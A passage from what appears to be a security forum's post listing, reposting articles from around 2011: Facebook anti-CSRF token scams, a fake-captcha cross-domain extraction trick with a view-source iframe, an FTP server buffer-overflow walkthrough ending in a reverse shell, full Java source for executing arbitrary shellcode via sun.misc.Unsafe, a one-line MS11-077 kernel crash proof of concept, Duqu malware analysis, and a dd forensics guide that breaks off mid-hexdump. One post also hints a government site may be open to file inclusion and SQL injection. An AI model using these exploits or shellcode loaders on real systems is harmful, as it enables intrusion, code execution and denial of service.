  13. Facebook spammers trick users into sharing anti-CSRF tokens Posted on 28 October 2011. Facebook spammers have already used a number of different approaches to make users inadvertently propagate their scams, and most of them fall into the social engineering category. A particularly intriguing technique has recently been spotted by Symantec researchers, who believe that this type of approach is likely to be used a lot in the near future. In short, the scammers make the victim's account post messages by executing a Cross-site Request Forgery attack after the victim herself has been tricked into sharing her anti-CSRF token generated by Facebook. Once they have the anti-CSRF token, the crooks can generate a valid CSRF token, which allows them to re-use an already authenticated session to the website to post the offending message unbeknownst to the user. The attack begins with a typical message inviting users to see an "amazing video" or similar content. A click on the link takes the user to a fake YouTube page, and when he wants to see the video, a window pops up telling him that he must pass the "Youtube Security Verification": When he clicks on the Generate Code link, a request is sent to 0.facebook.com/ajax/dtsg.php, which returns JavaScript code containing the session's anti-CSRF token in a separate window. After the user has copied and pasted the generated code into the empty field and pressed the "Confirm" button, he has effectively sent the code to the attacker who extracts the anti-CSRF token, creates a CSRF token and inserts is in his own piece of code that finally executes the CSRF attack and posts the malicious message and link on the user's Facebook Wall. Attacks asking Facebook users to copy/paste JavaScript in order to gain access to some content are not new to the social network, but spammers have not used them a lot lately. Perhaps it is because of the automated monitoring of accounts for suspicious behavior that Facebook has introduced, or perhaps they have misused the approach too many times in a short period, making users vary of such requests. In any case, the researchers believe that this particular approach might gain in popularity, but say that other innovative approaches are sure to come. Sursa: Facebook spammers trick users into sharing anti-CSRF tokens
  14. Cross domain content extraction with fake captcha TUESDAY, JULY 5, 2011 Content extraction is one of the recently documented UI redressing vectors. It exploits Firefox vulnerability that allows to display any URL HTML source in an iframe like this: <iframe src="view-source:http://any-page-you.like/cookies-included"> With social engineering attacker tricks user into selecting (usually invisible) page source and dragging it to attackers' controlled textarea. A simple demo is here: Once attacker gets the page source dropped into his textarea, he may begin to extract contents (like session IDs, user names, anti csrf tokens etc.) and launch further attacks. However, this way of using the vector requires significant effort from a user and is pretty difficult to exploit in real world situation (there's some clicking and dragging involved). Also, it will stop working once Mozilla disallows cross origin drag & dropping. I've found a neat way to do cross-origin content extraction that might be more suitable for some classes of websites. Ladies and gentleman, let me present Fake Captcha: NO MORE DRAG The weak point of the 'classic' method for me was the dragging that was involved. In Firefox, once you drag something, it displays a shadow of the object at the cursor - and a whole HTML source being displayed for the user is really hard to hide. I decided to convince the user to copy & paste the source with his clipboard instead. Copying & pasting requires four steps: selecting the text to copy ctrl-c navigating to target element ctrl-v Each of these steps requires user intervention. I could make a game/quiz that requires certain keypresses, but that's weak (although it works for Facebook users). Instead, I wanted it to feel natural for the user. Nothing is hidden and he just uses the clipboard because he wants to. SO, WHEN DO YOU USE A CLIPBOARD? Well, I don't like typing. So everytime I'm forced to repeat my e-mail address in a form, I just copypaste it. I decided to go that way. What if we display longish captcha-like 'security code' for a user to retype? 16 characters or more? Some of them will skip this step altogether, some will retype, but most will select the text and copy/paste. HOW DO YOU SELECT? You can select with your mouse. In Firefox, you can also select by double / tripple clicking. My assumption is that most of the users use the clicking method to select text. Double click stops at word boundary, third click expands to whole paragraph (try this text). In the above example, you need three clicks to select the whole visible code. Why do we care? I'M FRAMED! Because the security code input field is just precisely positioned part of the view-source:d victim page. And by tripple clicking user selects the whole line from the page source! DEMO It's best to see the demo to understand what's going on. We want to extract the anti-CSRF token from the victim page cross domain. The token is in the page source, line 7: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>NDCP</title> <script type="text/javascript"> var csrf_token = '35fb6df6-2ab9-408b-abe3-769412a58e15'; </script> <style> body { background: url(nuke.jpg) left top repeat; color: white; font-family: Verdana, arial, sans-serif; } // and so on So we display the source in a small frame, position it to only display a few characters, starting from line 7, column 19. Then we convince the user to select the whole line with tripple click - double click will stop at minus sign, so the user will probably do the third click to select all. After selecting he copies, clicks the next field and pastes. Then we're done. DETAILS MATTER See the source to appreciate all the small, but very important details, especially: how to measure the font size used in view-source: what was view-source:view-source: used for how to position an iframe to line / column of HTML source how the input and frame was styled to look similar HOW NOT TO GET OWNED? web developers - use X-Frame-Options header (js framebusting won't work here). Remember, once you allow your site to be framed, you're opening to a whole class of UI redressing attacks, most of the attacks are not even discovered yet, it's a new field of research. So if you don't use X-Frame-Options, better have a really good explanation. users - don't use Firefox or look carefully on what you do use NoScript SUMMARY There's a new 'fake captcha' method of using the content extraction UI redressing vector. Pros: does not require drag & dropping accounts for font-size differences more convincing for a user Cons: won't work if user uses mouse to select text (unless attacker is interested in only the visible part) requires a captcha like string in victim HTML source it's line / column position must be constant and known to attacker only one line of HTML source might be copied (but websites' HTML is often minimized to a single line) You might find the requirements very limiting. I also thought that's simply impossible to exploit in real life. Until I started looking - wait for the next post Update: Latest NoScript (2.1.2+) contains code neutralizing fake captcha method. Yeat another great work of Giorgio Maone! Update 2: Fake CAPTCHA technique spotted in the wild to extract Facebook CSRF tokens. Sursa: Cross domain content extraction with fake captcha
  15. Nytro

    Buna seara.

    Topic inchis.
  16. Nytro

    Anonsboat

    Cica: antena1 • Vezi subiect - HACKERII ANONYMOUS TREC LA FAPTE! Au si cont de Facebook si acelasi ID de messenger. Ca idee: Nu stiu ce parere aveti voi, dar cand am vazut ca folosesc nu stiu ce dumper, au facut cont pe .co.cc si vorbesc pe messenger... Mi se pare deja trist. "PS: MIRA - EXPECT US!" PS: Mai.gov.ro e posibil sa aiba si RFI, pe langa SQLI (un domeniu). Ziceam asa, sa va dau si voua de veste. Aveti grija.
  17. Creating your own Abstract Processor © Aodrulez Introduction In this paper, I'll try to explain to you how to create your own Abstract Processor. It can be really simple or absolutely complex & it'll depend entirely on your imagination. First of all, let me explain what is an Abstract Processor. Its nothing but a purely theoretical processor architecture that one can develop by programming at software level. If that sounded too complex, think of it like creating your own processor by writing code in lets say c/c++ or PERL with registers, stack-size etc that you define. Don't worry much if you didn't get the concept yet. Am sure you will grasp it on the way Download: http://dl.packetstormsecurity.net/papers/general/Abstract-Processor.pdf
  18. Thexero: Exploit Development - Abusing The Stack Description: Once you get into exploit development, you’d soon realize just how easy the process of developing an exploit becomes. To start with, generally a Buffer Over Flow condition causes the target application to crash. I first load up a simple python based fuzzer script and attempt to fuzz a free FTP server called ‘FreeFloat FTP Server’ which is hosted on a machine in my lab with the IP of 192.168.72.129. The program stops responding to our FTP requests after 300 A’s after the USER command. We then load the program into Immunity Debugger and attempt to replicate the crash once again and once crashed we notice that EIP has been completely overwritten with ’41414141? which is the hex equivalent to the letter A. For simplicities sake we decide to export the target IP address and port number to our local environment variables so that the potential of entering the wrong IP is minimized. We then load up Metasploit’s tool ‘Pattern Create’ to create us a unique string so that we can use that to help identify the exact position before we get to the EIP overwrite, which turned out to be 230. We then modify our buffer to include 230 A’s then send a ‘DEADBEEF’ as the address to overwrite EIP and the rest of our buffer is also overflowed into the ESP register which means that if we overwrite EIP to a memory address that has the command ‘JMP ESP’ that hopefully the next instruction will reside at ESP. We then send all hex bytes (minus the \x00 as it would kill out TCP connection to the FTP server) and attempt to identify any bad characters that may be included in our shellcode later on. Metasploit is then opened with the console interface and we begin to create test shellcode, while excluding the bad characters from the payload that will run the Windows calculator application. As the payload will be encoded we had to add 8 NOPs to our buffer so that there was sufficient room for the payload to decode itself. Once the test shellcode was added we tested our exploit which successfully crashed the program but at the same time executed our code and opened the Windows calculator. Back in metasploit we create a Windows reverse shell payload, again excluding the bad characters that we had previously found and wrote all the hex bytes to a file called ‘shellcode’ which we then opened with gedit. We then replaced the test Windows calculator payload with the first stage of our newly created staged Windows reverse shell payload to complete our exploit. Then we set up a metasploit to listen on port 4444 for a staged Windows reverse shell and executed our exploit, which resulted in the target machine connecting back to our machine. As we chose a staged payload our machine delivered stage 2 of the payload creating a full reverse Windows command prompt to be given to our machine and from then on we had full control over that session. Video: http://www.securitytube.net/video/2377
  19. Running shellcode from Java without JNI © 2011 Michael Schierl <schierlm at gmx dot de> (Twitter @mihi42) /* * Running shellcode from Java without JNI (i. e. loading a DLL from disk). * © 2011 Michael Schierl <schierlm at gmx dot de> (Twitter @mihi42) * * Tested versions: * .---------------------------.---------.------------.---------.-----------------. * | JVM version | MA slot | Native Ptr | Raw RET | EXITFUNC thread | * |===========================|=========|============|=========|=================| * | Oracle 1.4.2 Win32 | 25 | 15 | C3 | Not supported | * | Oracle 1.5 Win32 | 29 | 14 | C3 | Not supported | * | Oracle 1.6 Win32 | 29 | 19 | C3 | Not supported | * |---------------------------|---------|------------|---------|-----------------| * | Oracle 1.6 Linux 32-bit | 28 | 19 | C3 | Not supported | * '---------------------------'---------'------------'---------'-----------------' * * How to test other versions: * * 1. Compile this class with settings supported by your target JVM (and * -target 1.1) and run it without arguments. It will examine the class fields * for candidates that might hold a pointer to the method array. The method * array is a Java array that contains one entry for each method, and this * entry contains a native pointer to its entry point (for native methods). * Therefore we first have to find the offset of this pointer. First filter * out all values that are most likely not pointers (too small, too "round", * etc.) In case you have a debugger handy, look at the remaining candidates. * A method array will start with jvm flags (usually 0x00000001), a pointer * to the array's element class object, its length (which should be equal to * the number printed above the candidate table), and a pointer to each of the * elements. The rest (up to an architecture-dependent size) is padded with * zeros. If you don't have a debugger handy, just try all of the candidates * in the next step until you get success. * * [Note: On Win32, the slots before the pointer are filled with 0,0,0(,0,1,0,0).] * * 2. Run the class with the (suspected) correct method array slot number as its * (only) argument. If the slot was wrong, the JVM will most likely print an * obscure error message or crash. If the slot was correct, it will dump the * fields of the method object inside the array. One of these fields is a * native pointer of the function (by default, on Windows, this points to a * stub method that throws an UnsatisfiedLinkError). So examine the pointers * until you found this method, or again just use trial and error in the next * step. * * [Note: On Win32, there is 0 and another pointer before it, and 0,0,1 after] * * 3. Run the class with two parameters, first the method array slot number from * step one, then the native pointer slot number from step two. It will try to * fill that pointer with 0x4141414141414141, therefore examine the (expected) * crash log if it crashes at that pointer. If you cannot examine the crash log, * just try the following steps with each other alternative. The first two * parameters have to be kept for all the following steps, there are only parameters * to be added. * * 4. Run the class with "raw C3" as the 3rd and 4th parameter (if your architecture * uses a different opcode for RET, replace it, e. g. "raw DE AD BE EF". This code * will be written into a freshly allocated memory region and the region's base * address will be used for the pointer. This time, the program should not crash, * but return, and print a success message as last step. Running it with * "threaded raw C3" should result in the same results. * * 5. Use Metasploit or similar to build a native shellcode for your platform, * using EXITFUNC = thread (or similar) - EXITFUNC = RET would be better. Now run * the class with "file /path/to/your/shellcode" as 3rd and 4th parameter, which * should result in execution of your shellcode, but probably a crash afterwards. * Try again with "threaded file /path/to/your/shellcode". On Windows, both variants * run the shellcode, but crash/hang afterwards, therefore the "Not Supported" in the * last column of the table. [The unthreaded approach kills the Java process on exit, * the threaded approach hangs forever.] * * 6. Fill in the table above and send it to me */ import java.io.File; import java.io.FileInputStream; import java.lang.reflect.Array; import java.lang.reflect.Field; import sun.misc.Unsafe; public class ShellcodeTest implements Runnable { private static int addressSize; public static void main(String[] args) throws Exception { // avoid Unsafe.class literal here since it may introduce // a synthetic method and disrupt our calculations. java.lang.reflect.Field unsafeField = Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe"); unsafeField.setAccessible(true); Unsafe unsafe = (Unsafe) unsafeField.get(null); addressSize = unsafe.addressSize(); Class thisClass = Class.forName("ShellcodeTest"); final int METHOD_COUNT = thisClass.getDeclaredMethods().length + 1; System.out.println("[*] Shellcode class has " + METHOD_COUNT + " methods."); Field staticField = thisClass.getDeclaredField("addressSize"); Object staticFieldBase = unsafe.staticFieldBase(staticField); if (args.length == 0) { System.out.println("[*] Candidates for method array slot:"); long staticFieldOffset = unsafe.staticFieldOffset(staticField); printStaticSlots(unsafe, staticFieldBase, staticFieldOffset); System.out.println("[*] Select method array slot now!"); return; } long methodArraySlot = Integer.parseInt(args[0]); System.out.println("[*] Obtaining method array (slot " + methodArraySlot + ")"); Object methodArray = unsafe.getObject(staticFieldBase, methodArraySlot * addressSize); int methodCount = Array.getLength(methodArray); if (methodCount != METHOD_COUNT) { System.out.println("[-] ERROR: Array length is " + methodCount + ", should be " + METHOD_COUNT); return; } System.out.println("[+] Successfully obtained method array"); Field methodSlotField = Class.forName("java.lang.reflect.Method").getDeclaredField("slot"); methodSlotField.setAccessible(true); int shellcodeMethodSlot = ((Integer) methodSlotField.get(thisClass.getDeclaredMethod("shellcode", new Class[0]))).intValue(); System.out.println("[*] Obtaining method object (slot " + shellcodeMethodSlot + ")"); Object methodObject = Array.get(methodArray, shellcodeMethodSlot); System.out.println("[+] Successfully obtained method object"); if (args.length == 1) { System.out.println("[*] Candidates for native pointer slot:"); printStaticSlots(unsafe, methodObject, 30 * addressSize); System.out.println("[*] Select native pointer slot now!"); return; } long nativePtrSlot = Integer.parseInt(args[1]); long nativePtrTarget; boolean useThread = false; int argOffset = 2; if (args.length > 2 && args[2].equals("threaded")) { argOffset++; useThread = true; } if (args.length == argOffset) { System.out.println("[*] Setting native pointer slot to 0x4141414141414141 (should crash at that address!)"); nativePtrTarget = 0x4141414141414141L; } else { String mode = args[argOffset]; argOffset++; if (mode.equals("raw")) { // raw c3 nativePtrTarget = unsafe.allocateMemory(args.length - argOffset); for (int i = argOffset; i < args.length; i++) { unsafe.putByte(nativePtrTarget + i - argOffset, (byte) Integer.parseInt(args[i], 16)); } } else if (mode.equals("file")) { File file = new File(args[argOffset]); nativePtrTarget = unsafe.allocateMemory(file.length()); FileInputStream fis = new FileInputStream(file); int b; long ptr = nativePtrTarget; while ((b = fis.read()) != -1) { unsafe.putByte(ptr, (byte) ; ptr++; } } else { System.out.println("Unsupported mode: " + mode); return; } } System.out.println("[*] Trying to overwrite native method pointer (slot " + nativePtrSlot + ")"); if (addressSize == 8) unsafe.putLong(methodObject, nativePtrSlot * addressSize, nativePtrTarget); else unsafe.putInt(methodObject, nativePtrSlot * addressSize, (int) nativePtrTarget); System.out.println("[+] Successfully overwritten native method pointer"); if (useThread) { System.out.println("[*] Executing native method in thread"); Thread thread = new Thread(new ShellcodeTest()); thread.start(); System.out.println("[*] Thread started"); thread.join(); System.out.println("[*] Thread successfully finished"); } else { System.out.println("[*] Executing native method (drum roll...)"); shellcode(); System.out.println("[+] Executed native method and returned!"); } } public void run() { try { shellcode(); } catch (Throwable t) { t.printStackTrace(); } } private static void printStaticSlots(Unsafe unsafe, Object object, long maxOffset) { for (long offset = 0; offset < maxOffset; offset += addressSize) { long value = addressSize == 8 ? unsafe.getLong(object, offset) : unsafe.getInt(object, offset) & 0xFFFFFFFFL; System.out.println("\t" + offset / addressSize + "\t" + Long.toHexString(value)); } } private static native void shellcode(); } Sursa: [Java] /* * Running shellcode from Java without JNI (i. e. loading a DLL from disk). - Pastebin.com
  20. Nytro

    Buna seara.

    Inca o discutie penibila.
  21. The Mystery of Duqu: Part Two Aleks Kaspersky Lab Expert Posted October 25, 19:59 GMT Partea I: http://www.securelist.com/en/blog/208193182/The_Mystery_of_Duqu_Part_One Our investigation and research of Duqu malware continues. In our previous report, we made two points: - there are more drivers than it was previously thought; - it is possible that there are additional modules. Besides those key points, we concluded that unlike the massive Stuxnet infections, Duqu attacks and is contained within an extremely small number of targets. But before informing you about our new findings, I would like to pay tribute to the Hungarian research laboratory 'Crysys' for their work. They were the first who analyzed Duqu components and generated an excellent report. It was provided later to antivirus vendors and became the basis of further investigations.(Unfortunately, our company was not the first to receive this report, but now it’s even more interesting to find out everything about Duqu) Our experts continue to conduct in-depth analysis of all Duqu components, and find more evidence of similarities between Duqu and Stuxnet. A detailed report with our experts’ analysis of files and their structure is in progress and will be published later. This part of our research is not the most important and urgent. It is much more essential to understand the reasons and sequences of facts, which will be discussed here. Real incidents In our previous blog, we mentioned that in the previous 24 hours, we had found only one real incident after adding the detection of all known Duqu components. Since that incident, we have discovered more, and it allows us to make some conclusions about the attack vector itself. It is important to mention that we can’t either confirm or deny information from other AV vendors about known incidents in the UK, USA and possibly in Austria and Indonesia. We are making no comments on any incidents in Hungary. Let’s focus only on cases we’ve discovered with the help of Kaspersky Security Network. Incident #1: Sudan One of the first real infection cases took place in a very specific region as we confirmed earlier. It happened in Sudan. In this case, we found a completely new driver which differs from previous variants in both name and MD5. Based on our finding that the main Duqu module consists of three components (driver, DLL library and configuration file), we may speculate that two more files are a part of the package. But we haven’t observed any detections in our customer base with our current detection set. It means that these files are different from known examples (netp191/192.pnf, cmi4432/cmi4464.pnf). Unfortunately we were not able to connect with the infected user for a detailed analysis and research effort for this incident. Also, we don’t have a copy of the adp55xx.sys driver. We know only file name, size and checksum at this point. Incident #2: Iran At the moment, the highest number of Duqu incidents were found in Iran. This fact brings us back to the Stuxnet story and raises a number of issues. But first, let’s look into some details. We see the same situation: a new unique file name (iraid18.sys), an already known file size (24960 bytes) and a new checksum. But besides those three static file characteristics, there remain some differences. We found not only a new driver, but also a new configuration file “ird182.pnf”. Doubtless, it’s analogous to known files (same size 6570 bytes) but it’s different with the content because this file must be unique. It stores information about the infection date in order to control further uninstall process. Another driver is even more interesting. We were not able to restore its original name. And, despite being the same size as previous Duqu drivers, it is also different from iraid18.sys, which was also found at the infected location. It is different from all previous known drivers. At this point, we see an almost complete new set of modules with similar names: iraid18.sys + ird182.pnf + unknown main DLL library (which we suspect may have a name like “ird181.pnf”). Incident #3: Iran This incident is one of the most interesting. Here we have an infection of 2 systems connected to each other. Besides the fact that these systems are in one network, they were also infected with the same driver (new again) – igdkmd16b.sys. We were able to obtain a copy of this file: 1 Publisher Intel Corporation 2 Product Intel Graphics Accelerator 3 Description Intel Graphics Kernel Mode Driver 4 File version 2.2.0.15 5 Original name igdkmd16b.sys 6 Internal name igdkmd16b.sys 7 Size 25088 bytes 8 Date of compilation 17 October 2011 Notice that before this incident, we have never seen a file with the size 25088 bytes. Until this case, we have only seen drivers with the size of 24960 bytes (without digital signature) or 29568 bytes (with digital signature). In addition, we found two more files on one of the systems (unfortunately we weren’t able to get a copy of these files). The first file is a configuration file with the name netq795.pnf and the second file is an unknown driver with the same size of 25088 bytes, but with the different checksum. As it was in incident #2, here we also have an almost complete new set of modules: igdkmd16b.sys + netq795.pnf + unknown main DLL library (which we suspect may have a name like “netq794.pnf”). Incident #4: Iran As it was in all incidents described above there is a unique driver which differs from previous ones both in name (bpmgs.sys) and in size (24832 bytes). Unfortunately, we weren’t able to get a copy of the file and its content is still a mystery. The same goes for its corresponding configuration file. At the same time, we found a fact that is probably not related to this Duqu case. BUT! This computer was attacked for several times via network not so long time ago: on October 4 and October 16. Both attacks used an exploit abusing the MS08-067 vulnerability (e.g. which was used by Kido and Stuxnet). The IP address of the attacker is 63.87.255.149 (in both cases). It is owned by ‘MCI Communications Services, Inc.’, a subdivision of ‘Verizon Business’. So, imagine the situation. Two attacks in 12-day period from one IP address. What is the probability that this attack was automatically performed by Kido? It is possible in case of a single attack. It is impossible in case of two attacks. It means that we may suggest that these attacks were not accidental, but targeted. It is possible that the attacker used not only MS08-067, but also other exploits that were not traced. Conclusions and facts 1. We have recorded incidents just in Sudan and Iran; 2. We have no information about victim’s relations either with Iran’s nuclear program or with CAs or industries; 3. It is obvious that every single Duqu incident is unique with its own unique files with different names and checksums; 4. Duqu is used for targeted attacks with carefully selected victims(Here was APT word but it strikethrough because I don’t like this term); 5. We know that there are 13 different driver files at a minimum (and we have only 6 of them); 6. We haven’t found any ‘keylogger’ module usage. It is possible that either it has never been used in this particular set of incidents, or it has been encrypted, or it has been deleted from the systems; 7. Analysis of driver igdkmd16b.sys showed that there is a new encryption key, which means that existing detection methods of known PNF files (main DLL) are useless. It is obvious that the DLL is differently encoded in every single attack. Existing detection methods from the majority of AV vendors are able to successfully detect Duqu drivers. But the probability of missing detection of the main DLL component (PNF) is almost 100%; 8. Duqu is a multifunctional framework which is able to work with any number of any modules. Duqu is highly customizable and universal; 9. The main library (PNF) is able (export 5) to fully reconfigure and reinstall the package. It is able to install drivers and create additional components, record everything in the registry, etc. It means that if there is a connection to active C&C and commands, then Duqu’s infrastructure on a particular system might be changed completely; 10. Authors of Duqu were able to install updated modules on infected systems just before the information about this malware has been published because we continue to discover new Duqu drivers created on October 17, 2011. We do not exclude the fact that they were able to change C&C; 11. We do not exclude that known C&C in India was used only in the first known incident (see original report from Crysys Lab)and that there are unique C&Cs for every single target, including targets found by us; 12. Reports that Duqu works on infected systems for only for 36 days is not entirely correct. Even this data point is customized: only jminet7.sys/netp191.pnf uses its 36-day counter. Set of modules cmi4432.sys/cmi4432.pnf will remove itself after 30 days. Sursa: http://www.securelist.com/en/blog/208193197/The_Mystery_of_Duqu_Part_Two
  22. DDoS and SQL injection are main topics on hacking forums By Lucian Constantin, IDG News Service October 18, 2011 11:05 AM ET Distributed denial of service and SQL injection are the main types of attack discussed on hacking forums, according to new research from security vendor Imperva. Underground discussion forums are an important piece in the cybercriminal ecosystem. They offer a place for hackers to sell and exchange information, software tools, exploits, services and other illegal goods. "Forums are the cornerstone of hacking -- they are used by hackers for training, communications, collaboration, recruitment, commerce and even social interaction," Imperva stressed. The company's researchers have recently analyzed discussions going back several years from HackForums.net, one of the largest hacker forums with over 220,000 registered members. Their effort was aimed at determining the most common attack targets, what business trends can be observed, and what directions hackers are leaning toward. As far as attack popularity goes, the analysts determined that DDoS was mentioned in 22 percent of discussions. SQL injection, a technique commonly used to compromise websites, is the second most frequently discussed attack method, being at the center of 19 percent of conversations. Unsurprisingly, with a 16 percent discussion occurrence rate, spam is the third most favorite attack type according to Imperva's content analysis. That's probably because it is one of the primary methods of generating illegal income. Zero-day exploits make up 10 percent of attack discussions on the forum, however, Microsoft's latest Security Intelligence Report (SIR) claims that this type of exploit is used in less than 1 percent of real-world compromises. Forums are also an important learning tool for new hackers -- Imperva determined that up to a quarter of discussions fall into the beginner hacking category. Another 25 percent of conversations involved hacking tools and programs, while a fifth mentioned Web and forum hacking. One trend observed by Imperva's researchers was that mobile hacking is increasingly popular. This is also reflected in real-world attack statistics and reports from other vendors. iPhone hacking in particular accounted for half of conversations on this topic. Overall, discussions about hacking have increased more than 150 percent over the last four years. "We think the growth in hacker forum activity helps explain that, along with automated hacking, there are simply more hackers causing more breaches," Imperva concluded. Sursa: DDoS and SQL injection are main topics on hacking forums
  23. MS11-077 Win32k Null Pointer De-reference Vulnerability POC # Exploit Code. Only a single line of code can cause BSOD # Exploit Title: MS11-077 Win32k Null Pointer De-reference Vulnerability POC # Date: 10/19/2011 # Author: KiDebug # Version: Windows XP SP3 32bit # Tested on: Windows XP SP3 32bit # CVE : CVE-2011-1985 # Exploit Code. Only a single line of code can cause BSOD: #include <Windows.h> void main() { SendMessageCallback((HWND)-1,CB_ADDSTRING,0,0,0,0); } or: #include <Windows.h> void main() { SendNotifyMessage((HWND)-1,CB_ADDSTRING,0,0); } Those messages can aslo cause BSOD: // CB_ADDSTRING 0x0143 // CB_INSERTSTRING 0x014A // CB_FINDSTRING 0x014C // CB_SELECTSTRING 0x014D // CB_FINDSTRINGEXACT 0x0158 // LB_ADDSTRING 0x0180 // LB_INSERTSTRING 0x0181 // LB_SELECTSTRING 0x018C // LB_FINDSTRING 0x018F // LB_FINDSTRINGEXACT 0x01A2 // LB_INSERTSTRINGUPPER 0x01AA // LB_INSERTSTRINGLOWER 0x01AB // LB_ADDSTRINGUPPER 0x01AC // LB_ADDSTRINGLOWER 0x01AD 0: kd> r eax=0000001b ebx=ee0af1fa ecx=ffffffff edx=bbdd0650 esi=ffffffff edi=ee21fd64 eip=bf914e9b esp=ee21fd08 ebp=ee21fd08 iopl=0 nv up ei pl nz na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206 win32k!NtUserfnINCBOXSTRING+0x8: bf914e9b 8b4120 mov eax,dword ptr [ecx+20h] ds:0023:0000001f=???????? 0: kd> kp ChildEBP RetAddr ee21fd08 bf80ef2b win32k!NtUserfnINCBOXSTRING+0x8 ee21fd40 8054261c win32k!NtUserMessageCall+0xae ee21fd40 7c92e4f4 nt!KiFastCallEntry+0xfc 0012ff2c 77d194be ntdll!KiFastSystemCallRet 0012ff5c 00401015 USER32!NtUserMessageCall+0xc 0012ff78 0040114c 1!main(void)+0x15 [[r:\temp\1\1.cpp @ 6] 0012ffc0 7c817067 1!__tmainCRTStartup(void)+0x10b [f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c @ 278] 0012fff0 00000000 kernel32!BaseProcessStart+0x23 Sursa: MS11-077 Win32k Null Pointer De-reference Vulnerability POC
  24. How to acquire "locked" files from a running Windows system By Par Osterberg Medina. Tuesday, October 25, 2011 Windows systems offer a variety of special files that contain important pieces of information that are useful in a forensic investigation. Some obvious examples include the pagefile.sys, event log, registry hives, and NTFS-specific files such as the Master File Table ($MFT). It is a common misconception of many forensic investigators and incident responders that collecting these special files from a live system is cumbersome and impossible to do via the command line. In this blog post I will show a couple different ways to bypass the protection mechanism that Windows holds on these files. Without this hold, it then becomes possible to acquire these files from a running system. You have most likely found yourself in the situation were you wanted to copy a file from a running Windows system, only to be greeted with the infamous "File in Use" dialog box. This is Windows’ way of ensuring that the file is not changed by another process while we are copying it so that we’re not left with a distorted version. For us to succeed with the copy operation we need to communicate directly with the hard drive of the system. This may be accomplished by referring to the volume that the file resides on using Win32 device namespaces, also called "DOS Devices". Win32 Device Namespace By using the "\\.\" prefix we will access the Win32 device namespace (or NamedPipe) instead of the Win32 file namespace to give us direct access to physical disks and volumes without enforcing Windows file protections. In order to illustrate how the process is carried out I will use a tool from Microsoft called ‘nfi’ (NTFS File Sector Information Utility). Identifying Sector Addresses This particular tool is included in the OEM Support Tools for NT 4.0 and Windows 2000 and was originally released June 23, 2000. ‘nfi’ will query the NTFS file system for information regarding a file or a specific sector address in the file system. A sector is the smallest building block on a hard drive and is set by the manufactures of hard drives. One important piece of information that ‘nfi’ gives us is the addresses to the sectors of the file we want to acquire. In the following example, using a 64bit version of Windows 7, we will first create a file (foundstone.txt) and then view its NTFS properties using ‘nfi’: C:\>ver Microsoft Windows [Version 6.1.7601] C:\>FOR /L %i IN (1,1,20) DO @echo data data data data data data >> c:\foundstone.txt C:\>nfi.exe c:\foundstone.txt NTFS File Sector Information Utility. Copyright (C) Microsoft Corporation 1999. All rights reserved. \foundstone.txt $STANDARD_INFORMATION (resident) $FILE_NAME (resident) $FILE_NAME (resident) $DATA (nonresident) logical sectors 7357616-7357623 (0x7044b0-0x7044b7) Notice the last line, this tells us that foundstone.txt is located on logical sectors 7357616-7357623. With this information we can continue to carve out the file from the file system. This is a technique that is commonly referred to as “disk carving” and is used quite extensively in computer forensics. Disk Carving The tool of choice for disk carving is ‘dd’, the “Swiss army knife” of disk based forensics. In this example I will be using the version of ‘dd’ that is included in the Forensic Acquisition Utilities (FAU) written by George M. Garner Jr. First we need specify the Win32 device namespace of our volume as the input file (“if”) and the size of our sectors as the block size (“bs”). We also need to specify where on the volume we want to start carving (“skip”) and how many sectors we want to process (“count”). The option ‘conv=noerror’ tells the program no to stop its operation if it encounter any errors. Below we’ve also piped the output into hexdump so it’s a little easier to read. C:\>dd.exe if=\\.\c: skip=7357616 bs=512 count=8 conv=noerror |hexdump 0000000: 6461 7461 2064 6174 6120 6461 7461 2064 data data data d 0000010: 6174 6120 6461 7461 2064 6174 6120 0a64 ata data data .d 0000020: 6174 6120 6461 7461 2064 6174 6120 6461 ata data data da 0000030: 7461 2064 6174 6120 6461 7461 200a 6461 ta data data .da 0000040: 7461 2064 6174 6120 6461 7461 2064 6174 ta data data dat 0000050: 6120 6461 7461 2064 6174 6120 0a64 6174 a data data .dat 0000060: 6120 6461 7461 2064 6174 6120 6461 7461 a data data data 0000070: 2064 6174 6120 6461 7461 200a 6461 7461 data data .data 0000080: 2064 6174 6120 6461 7461 2064 6174 6120 data data data 0000090: 6461 7461 2064 6174 6120 0a64 6174 6120 data data .data 00000a0: 6461 7461 2064 6174 6120 6461 7461 2064 data data data d 00000b0: 6174 6120 6461 7461 200a 6461 7461 2064 ata data .data d 00000c0: 6174 6120 6461 7461 2064 6174 6120 6461 ata data data da 00000d0: 7461 2064 6174 6120 0a64 6174 6120 6461 ta data .data da 00000e0: 7461 2064 6174 6120 6461 7461 2064 6174 ta data data dat 00000f0: 6120 6461 7461 200a 6461 7461 2064 6174 a data .data dat 0000100: 6120 6461 7461 2064 6174 6120 6461 7461 a data data data 0000110: 2064 6174 6120 0a64 6174 6120 6461 7461 data .data data 0000120: 2064 6174 6120 6461 7461 2064 6174 6120 data data data 0000130: 6461 7461 200a 6461 7461 2064 6174 6120 data .data data 0000140: 6461 7461 2064 6174 6120 6461 7461 2064 data data data d 0000150: 6174 6120 0a64 6174 6120 6461 7461 2064 ata .data data d 0000160: 6174 6120 6461 7461 2064 6174 6120 6461 ata data data da 0000170: 7461 200a 6461 7461 2064 6174 6120 6461 ta .data data da 0000180: 7461 2064 6174 6120 6461 7461 2064 6174 ta data data dat 0000190: 6120 0a64 6174 6120 6461 7461 2064 6174 a .data data dat 00001a0: 6120 6461 7461 2064 6174 6120 6461 7461 a data data data 00001b0: 200a 6461 7461 2064 6174 6120 6461 7461 .data data data 00001c0: 2064 6174 6120 6461 7461 2064 6174 6120 data data data 00001d0: 0a64 6174 6120 6461 7461 2064 6174 6120 .data data data 00001e0: 6461 7461 2064 6174 6120 6461 7461 200a data data data . 00001f0: 6461 7461 2064 6174 6120 6461 7461 2064 data data data d 0000200: 6174 6120 6461 7461 2064 6174 6120 0a64 ata data data .d 0000210: 6174 6120 6461 7461 2064 6174 6120 6461 ata data data da 0000220: 7461 2064 6174 6120 6461 7461 200a 6461 ta data data .da 0000230: 7461 2064 6174 6120 6461 7461 2064 6174 ta data data dat 0000240: 6120 6461 7461 2064 6174 6120 0a64 6174 a data data .dat 0000250: 6120 6461 7461 2064 6174 6120 6461 7461 a data data data 0000260: 2064 